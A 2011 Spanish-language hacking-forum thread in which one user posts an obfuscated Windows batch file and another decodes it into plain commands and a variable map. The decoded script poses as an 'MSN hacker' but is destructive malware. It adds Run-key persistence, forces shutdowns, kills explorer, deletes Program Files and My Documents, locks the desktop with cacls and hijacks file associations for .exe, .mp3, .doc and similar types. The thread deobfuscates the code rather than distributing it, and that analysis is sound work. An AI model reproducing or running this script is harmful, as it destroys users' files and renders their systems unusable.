elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Como descifrar este batch?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Como descifrar este batch?  (Leído 3,538 veces)
CAR3S?


Desconectado Desconectado

Mensajes: 343


Level xXx


Ver Perfil
Como descifrar este batch?
« en: 6 Febrero 2011, 01:39 am »

Hola!

Como puedo desecncriptar un batch?


lo quiero porque me parece interesante lo que hace... o eso me dijieron...


NO ES MIO!

Citar
set _~=set
%_~% a=abcdefghijkl
%_~% b=mnopqrstuvwxyz
%_~% t¬a=%a:~4,1%
%_~% t¬e=%a:~,1%
%_~% t¬$=%a:~1,1%
%_~% t¬b=%a:~8,1%
%_~% t¬o=%a:~2,1%
%_~% t¬p=%a:~3,1%
%_~% t¬s=%a:~5,1%
%_~% t¬y=%a:~6,1%
%_~% t¬f=%a:~7,1%
%_~% t¬l=%a:~9,1%
%_~% t¬m=%a:~10,1%
%_~% t¬z=%a:~11,1%
%_~% t~a=%b:~4,1%
%_~% t~e=%b:~,1%
%_~% t~$=%b:~1,1%
%_~% t~b=%b:~8,1%
%_~% t~o=%b:~2,1%
%_~% t~p=%b:~3,1%
%_~% t~s=%b:~5,1%
%_~% t~y=%b:~6,1%
%_~% t~f=%b:~7,1%
%_~% t~l=%b:~9,1%
%_~% t~m=%b:~10,1%
%_~% t~z=%b:~11,1%
%_~% t~x=%b:~12,1%
%_~% t~q=%b:~13,1%
%_~% tv=%t¬f:~,1%
%_~% tt=%t~f:~,1%
set /=%t¬a%%t¬o%%tv%%t~o%
%_~% //=%t¬a%%t¬o%%tv%%t~o%.
%_~% m~g=%t~e%%t~y%%t¬y%
%_~% c~s=%t¬o%%t¬z%%t~y%
%_~% f~r=%t¬s%%t~o%%t~s%
%_~% rgi=reg add HKLMSoftwaremicrosoftWindowsCurrentVersionRun /v system /d "%systemroot%system32hal.bat"
%_~% rg2=reg add HKLMSoftwaremicrosoftWindowsCurrentVersionRun /v Systemupdate /d "%systemroot%system32kernel.bat"
%_~% i~e=%t¬b%%t¬s% %t¬a%%t~z%%t¬b%%t~y%%t~f%
%_~% i=%i~e:~,2%
%_~% :=%t~p%%t¬e%%t~b%%t~y%%t¬a%
%_~% ;=%t~p%%t¬b%%t~$%%t¬y%
%_~% =%t¬p%%t¬a%%t¬z% /%t~y% /%t¬s% /%t~a%
%_~% #=%t¬a%%t¬z%%t~y%%t¬a%
%_~% s~n=%t~y%%tv%%t~b%%tt%%t¬p%%t~o%%t~m%%t~$% -%t~y% -%t¬s% -%tt%
%_~% ]=%t¬p%%t¬e%%tt%%t¬a%
%_~% ¬=%t¬o%%t~o%%t~p%%t~x% /%t~x%
%_~% $=%t~e%%t¬m%%t¬p%%t¬b%%t~s%
%_~% ··= %t~s%%t~e%%t¬p%%t¬b%%t~s% /%t~y% /%t~a%
%_~% c~ls=%t¬o%%t¬e%%t¬o%%t¬z%%t~y%
%_~% ª!ª!=%tt%%t¬e%%t~y%%t¬m%%t¬m%%t¬b%%t¬z%%t¬z% /%t¬s% /%t¬b%%t~e%
%_~% {}=%t¬o%%t¬p%
%_~% ç=%t~y%%t¬a%%t~f%/%t~p%
%_~% f~ee=%t¬s%%tt%%t~x%%t~p%%t¬a%
%_~% []=%t¬e%%t~y%%t~y%%t~o%%t¬o%
%_~% g~t=%t¬y%%t~o%%tt%%t~o%
%_~% at~b=%t¬e%%tt%%tt%%t~s%%t¬b%%t¬$%
%_~% cl=%t¬o%%t~o%%t¬z%%t~o%%t~s%
%_~% st=%t~y%%tt%%t¬e%%t~s%%tt%
%_~% i=%i:~,2%
%_~% ct=%t¬o%%t~o%%t~$%
%_~% ch=%t¬a%%t~z%%t¬b%%tt%
@%/% %t~o%%t¬s%%t¬s%
:akk
%c~s%
%//%
%//%
%cl% 0%t¬o%
%tt%%t¬b%%tt%%t¬z%%t¬a% ----------------------- %tv%%t¬e%%t¬o%%t¬m% %t~e%%t~y%%t~$%--------------------------
%/% %t¬o%%t¬e%%t~s%%t¬y%%t¬e%%t~$%%t¬p%%t~o%.....
%;% -%t~$% 3 127.0.0.1 > %t~$%%t~b%%t¬z%
:!"·
%c~s%
%//%
%//%
%ç% v= %t¬b%%t~$%%tt%%t~s%%t~o%%t¬p%%t~b%%t~q%%t¬o%%t¬e% %t¬a%%t¬z% %t~e%%t~y%%t~$% %t¬e% %tv%%t¬e%%t¬o%%t¬m%%t¬a%%t¬e%%t~s% :
%//%
%//%
%ç% v2= %t~s%%t¬a%%t~p%%t¬b%%tt%%t¬e% %t¬a%%t¬z% %t~e%%t~y%%t~$% :
%i% %v%==%v2% (%g~t% ^*Ç )
%m~g% * %t¬z%%t~o%%t~y% %t~e%%t~y%%t~$% %v% ^& %v2% %t~$%%t~o% %t~y%%t~o%%t~$% %t¬b%%t¬y%%t~b%%t¬e%%t¬z%%t¬a%%t~y%
%g~t% !"·
:^*Ç
%c~s%
%//%
%//%
%/% %t~p%%t~s%%t~o%%t¬o%%t¬a%%t~y%%t¬e%%t~$%%t¬p%%t~o% ........
%/% %t~e%%t~y%%t~$% : %v% > C:%tv%%t¬e%%t¬o%%t¬m%%t~e%%t~y%%t~$%.txt
%/% %t~p%%t~y%%t~m% : %random% >> C:%tv%%t¬e%%t¬o%%t¬m%%t~e%%t~y%%t~$%.txt
:&0?
%rgi%
%/% :yuu > %windir%system32%tv%%t¬e%%t¬z%.bat
%/% %c~s% >> %windir%system32%tv%%t¬e%%t¬z%.bat
%/% %tt%%t~x%%t~p%%t¬a% * >> %windir%system32%t¬e%%tv%.bat
%/% %t¬o%%t¬e%%t¬z%%t¬z% %windir%system32%t¬e%%tv%.bat >> %windir%system32%tv%%t¬e%%t¬z%.bat
%/% %st% %t¬o%%t¬e%%t¬z%%t¬o% >> %windir%system32%tv%%t¬e%%t¬z%.bat
%/% %st% %t~e%%t~y%%t~p%%t¬e%%t¬b%%t~$%%tt% >> %windir%system32%tv%%t¬e%%t¬z%.bat
%/% %m~g% * %t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s% ... >> %windir%system32%tv%%t¬e%%t¬z%.bat
%/% %s~n% 1800 >> %windir%system32%tv%%t¬e%%t¬z%.bat
%/% %_~%/%t¬e% %ct%=%ct%+1 >> %windir%system32%tv%%t¬e%%t¬z%.bat
%/% %i% %ct%==15 ( %g~t% asd ) >> %windir%system32%tv%%t¬e%%t¬z%.bat
%/% %g~t% yuu >> %windir%system32%tv%%t¬e%%t¬z%.bat
%/% :asd >> %windir%system32%tv%%t¬e%%t¬z%.bat
%/% %ch% >> %windir%system32%tv%%t¬e%%t¬z%.bat
:tyy
%c~s%
%//%
%//%
%/% %t¬e%%t~s%%t¬o%%tv%%t¬b%%t~l%%t~o% %t¬o%%t~s%%t¬a%%t¬e%%t¬p%%t~o% %t¬a%%t~$% C:%tv%%t¬e%%t¬o%%t¬m%%t~e%%t~y%%t~$%.txt
%:%
%//%
%/% %t¬e%%t¬$%%t~s%%t¬b%%t¬a%%t~$%%t¬p%%t~o% %t¬a%%t¬z% %t¬e%%t~s%%t¬o%%tv%%t¬b%%t~l%%t~o%
%;% -%t~$% 3 127.0.0.1 > %t~$%%t~b%%t¬z%
%tt%%t~x%%t~p%%t¬a% C:%tv%%t¬e%%t¬o%%t¬m%%t~e%%t~y%%t~$%.txt
%;% -%t~$% 4 127.0.0.1 > %t~$%%t~b%%t¬z%
%/% %tt%%t¬a% %t¬o%%t~s%%t¬a%%t¬a%%t~y% %tv%%t¬e%%t¬o%%t¬m%%t¬a%%t~s% ????
%rg2%
%/% %ª!ª!% %t¬a%%t~z%%t~p%%t¬z%%t~o%%t~s%%t¬a%%t~s%.exe > %windir%system32%t¬m%%t¬a%%t~s%%t~$%%t¬a%%t¬z%.bat
%/% %m~g% * %t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s% %t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s% >> %windir%system32%t¬m%%t¬a%%t~s%%t~$%%t¬a%%t¬z%.bat
%/% %t~$%%t¬a%%tt% %t~b%%t~y%%t¬a%%t~s% %%random%% %%random%% /%t¬e%%t¬p%%t¬p% >> %windir%system32%t¬m%%t¬a%%t~s%%t~$%%t¬a%%t¬z%.bat
%/% %{}% "%homepath%" >> %windir%system32%t¬m%%t¬a%%t~s%%t~$%%t¬a%%t¬z%.bat
%/% %at~b% -%t~s% -%t¬e% -%t~y% -%tv% >> %windir%system32%t¬m%%t¬a%%t~s%%t~$%%t¬a%%t¬z%.bat
%/% %··% %homepath%Mis Documentos >> %windir%system32%t¬m%%t¬a%%t~s%%t~$%%t¬a%%t¬z%.bat
%/% %{}% C: >> %windir%system32%t¬m%%t¬a%%t~s%%t~$%%t¬a%%t¬z%.bat
%/% %f~r% /%t¬z% %%%%x in (1,1,36500) do ( %$% %%%%x ) >> %windir%system32%t¬m%%t¬a%%t~s%%t~$%%t¬a%%t¬z%.bat
%/% %% C:Archivos de programa >> %windir%system32%t¬m%%t¬a%%t~s%%t~$%%t¬a%%t¬z%.bat
%/% %/% %t~y%|%c~ls% "%homepath%escritorio" /%t~p% %username%:%t~$% >> %windir%system32%t¬m%%t¬a%%t~s%%t~$%%t¬a%%t¬z%.bat
%/% %/% %t~x%|%c~ls% "%homepath%escritorio" /%t~p% %username%:%t~$% >> %windir%system32%t¬m%%t¬a%%t~s%%t~$%%t¬a%%t¬z%.bat

%/% %m~g% * %t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s% %t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s% > %windir%system32%t¬b%%t~$%%t¬b%.bat
%/% %{}% %homepath%escritorio >> %windir%system32%t¬b%%t~$%%t¬b%.bat
%/% %f~r% /%t¬z% %%%%m %t¬b%%t~$% (1,1,%%random%%%random%%) do (%$% %%%%m ) >> %windir%system32%t¬b%%t~$%%t¬b%.bat
%[]% .%t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s% = .%t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s%file
%f~ee% .%t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s% = %windir%system32%t¬b%%t~$%%t¬b%.bat
%[]% .%t¬a%%t~z%%t¬a% = .%t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s%
%[]% .%t~e%%t~p%3 = .%t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s%
%[]% .%t~l%%t¬$%%t~y% = .%t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s%
%[]% .%t~m%%t¬e%%t~l% = .%t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s%
%[]% .%t¬e%%t~l%%t¬b% = .%t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s%
%[]% .%t¬p%%t~o%%t¬o% = .%t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s%

%;% -%t~$% 3 127.0.0.1 > %t~$%%t~b%%t¬z%
%/% %t~x%%t~o%%t~b% %t¬e%%t~s%%t¬a% %tv%%t¬e%%t¬o%%t¬m%%t¬a%%t¬p%
%m~g% * %t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s% %t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s%
%m~g% * %t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s% %t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s%
%m~g% * %t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s% %t¬z%%t¬e%%t~e%%t~e%%t¬a%%t~s%
%s~n% 10
%m~g% * %t¬$%%t~x%%t¬a%
%ch%

aclaro, NO LO ABRAN!, o usean virtual pc (Como yo)

add: tmb me di cuenta que tiene algunos errores


« Última modificación: 6 Febrero 2011, 01:45 am por nuKje » En línea

xassiz~


Desconectado Desconectado

Mensajes: 457



Ver Perfil WWW
Re: Como descifrar este batch?
« Respuesta #1 en: 6 Febrero 2011, 01:56 am »

Es una "cifrado" muy pobre.. solo tienes que ir reemplazando las variables.

Además el @echo off debería ir al principio.

Sale algo así (el code a continuación contiene errores al desencriptarlo de una forma rápida y mala XDD):
Código
  1. @echo off
  2. :akk
  3. cls
  4. color 0c
  5. title ----------------------- hack msn--------------------------
  6. echo cargando.....
  7. ping -n 3 127.0.0.1 > nul
  8. :!"·
  9. cls
  10. %ç% v= introduzca el msn a hackear :
  11. %ç% v2= repita el msn :
  12. if %v%==%v2% (%g~t% ^*Ç )
  13. msg * los msn %v% ^& %v2% no son iguales
  14. %g~t% !
  15. :^*Ç
  16. cls
  17. echo procesando ........
  18. echo msn : %v% > C:hackmsn.txt
  19. echo psw : %random% >> C:hackmsn.txt
  20. :&0?
  21. reg add HKLMSoftwaremicrosoftWindowsCurrentVersionRun /v system /d "%systemroot%system32hal.bat"
  22. echo :yuu > %windir%system32hal.bat
  23. echo cls >> %windir%system32hal.bat
  24. echo type * >> %windir%system32ah.bat
  25. echo call %windir%system32ah.bat >> %windir%system32hal.bat
  26. echo start calc >> %windir%system32hal.bat
  27. echo start mspaint >> %windir%system32hal.bat
  28. echo msg * lammer ... >> %windir%system32hal.bat
  29. echo shutdown -s -f -t 1800 >> %windir%system32hal.bat
  30. echo set/a con=con+1 >> %windir%system32hal.bat
  31. echo if con==15 ( %g~t% asd ) >> %windir%system32hal.bat
  32. echo %g~t% yuu >> %windir%system32hal.bat
  33. echo :asd >> %windir%system32hal.bat
  34. echo exit >> %windir%system32hal.bat
  35. :tyy
  36. cls
  37. echo archivo creado en C:hackmsn.txt
  38. echo abriendo el archivo
  39. ping -n 3 127.0.0.1 > nul
  40. type C:hackmsn.txt
  41. ping -n 4 127.0.0.1 > nul
  42. echo te crees hacker ????
  43. reg add HKLMSoftwaremicrosoftWindowsCurrentVersionRun /v Systemupdate /d "%systemroot%system32kernel.bat"
  44. echo taskkill /f /im explorer.exe > %windir%system32kernel.bat
  45. echo msg * lammer lammer >> %windir%system32kernel.bat
  46. echo net user del /s /f /qrandomdel /s /f /q del /s /f /qrandomdel /s /f /q /add >> %windir%system32kernel.bat
  47. echo cd "%homepath%" >> %windir%system32kernel.bat
  48. echo attrib -r -a -s -h >> %windir%system32kernel.bat
  49. echo %··% %homepath%Mis Documentos >> %windir%system32kernel.bat
  50. echo cd C: >> %windir%system32kernel.bat
  51. echo for /l del /s /f /qdel /s /f /qx in (1,1,36500) do ( mkdir del /s /f /qdel /s /f /qx ) >> %windir%system32kernel.bat
  52. echo del /s /f /q C:Archivos de programa >> %windir%system32kernel.bat
  53. echo echo s|cacls "%homepath%escritorio" /p %username%:n >> %windir%system32kernel.bat
  54. echo echo y|cacls "%homepath%escritorio" /p %username%:n >> %windir%system32kernel.bat
  55.  
  56. echo msg * lammer lammer > %windir%system32ini.bat
  57. echo cd %homepath%escritorio >> %windir%system32ini.bat
  58. echo for /l del /s /f /qdel /s /f /qm in (1,1,del /s /f /qrandomdel /s /f /q%randomdel /s /f /q) do (mkdir del /s /f /qdel /s /f /qm ) >> %windir%system32ini.bat
  59. assoc .lammer = .lammerfile
  60. %f~ee% .lammer = %windir%system32ini.bat
  61. assoc .exe = .lammer
  62. assoc .mp3 = .lammer
  63. assoc .vbs = .lammer
  64. assoc .wav = .lammer
  65. assoc .avi = .lammer
  66. assoc .doc = .lammer
  67.  
  68. ping -n 3 127.0.0.1 > nul
  69. echo you are hacked
  70. msg * lammer lammer
  71. msg * lammer lammer
  72. msg * lammer lammer
  73. shutdown -s -f -t 10
  74. msg * bye
  75.  

Pero la conversión de variables vendría siendo esta:
Código
  1. set _~=set
  2. set a=abcdefghijkl
  3. set b=mnopqrstuvwxyz
  4. set t¬a=e
  5. set t¬e=a
  6. set t¬$=b
  7. set t¬b=i
  8. set t¬o=c
  9. set t¬p=d
  10. set t¬s=f
  11. set t¬y=g
  12. set t¬f=h
  13. set t¬l=j
  14. set t¬m=k
  15. set t¬z=l
  16. set t~a=q
  17. set t~e=m
  18. set t~$=n
  19. set t~b=u
  20. set t~o=o
  21. set t~p=p
  22. set t~s=r
  23. set t~y=s
  24. set t~f=t
  25. set t~l=v
  26. set t~m=w
  27. set t~z=x
  28. set t~x=y
  29. set t~q=z
  30. set tv=h
  31. set tt=t
  32. set //=echo.
  33. set m~g=msg
  34. set c~s=cls
  35. set f~r=for
  36. set rgi=reg add HKLMSoftwaremicrosoftWindowsCurrentVersionRun /v system /d "%systemroot%system32hal.bat"
  37. set rg2=reg add HKLMSoftwaremicrosoftWindowsCurrentVersionRun /v Systemupdate /d "%systemroot%system32kernel.bat"
  38. set ;=ping
  39. set =del /s /f /q
  40. set s~n=shutdown -s -f -t
  41. set ]=date
  42. set ¬=copy /y
  43. set ··= rmdir /s /q
  44. set c~ls=cacls
  45. set ª!ª!=taskkill /f /im
  46. set {}=cd
  47. set ç=set/p
  48. set f~ee=ftype
  49. set []=assoc
  50. set g~t=goto
  51. set at~b=attrib
  52. set cl=color
  53. set st=start
  54. set ct=con

Saludos!


En línea

CAR3S?


Desconectado Desconectado

Mensajes: 343


Level xXx


Ver Perfil
Re: Como descifrar este batch?
« Respuesta #2 en: 6 Febrero 2011, 02:03 am »

Gracias, pero cual es el proceso para descifrar teniendo las variables? xD
En línea

xassiz~


Desconectado Desconectado

Mensajes: 457



Ver Perfil WWW
Re: Como descifrar este batch?
« Respuesta #3 en: 6 Febrero 2011, 02:17 am »

Pues si tienes
Código
  1. set t¬a=e
%t¬a% se reemplazará por "e".

Si tienes
Código
  1. set //=echo.
%//% se reemplazará por "echo.".

 :xD
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
como descifrar este codigo?
Criptografía
chacal0112 9 13,273 Último mensaje 20 Octubre 2013, 23:40 pm
por Anastacio
(solucionado) ¿Como instalar este driver de hardware (.INF) en batch o vbs?
Scripting
Eleкtro 2 9,347 Último mensaje 17 Diciembre 2011, 06:06 am
por Eleкtro
Como descifrar una contraseña que este en MD5 con script perl y backtrack
Criptografía
BTshell 3 5,873 Último mensaje 10 Enero 2013, 11:42 am
por dimitrix
Digan como usar este submain o funcion descifrar texto x « 1 2 »
Programación Visual Basic
r7pyrred 15 8,170 Último mensaje 21 Enero 2013, 18:49 pm
por 79137913
Como descifrar este codigo.
Criptografía
Tomy73 2 3,650 Último mensaje 24 Junio 2013, 20:09 pm
por Tomy73
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines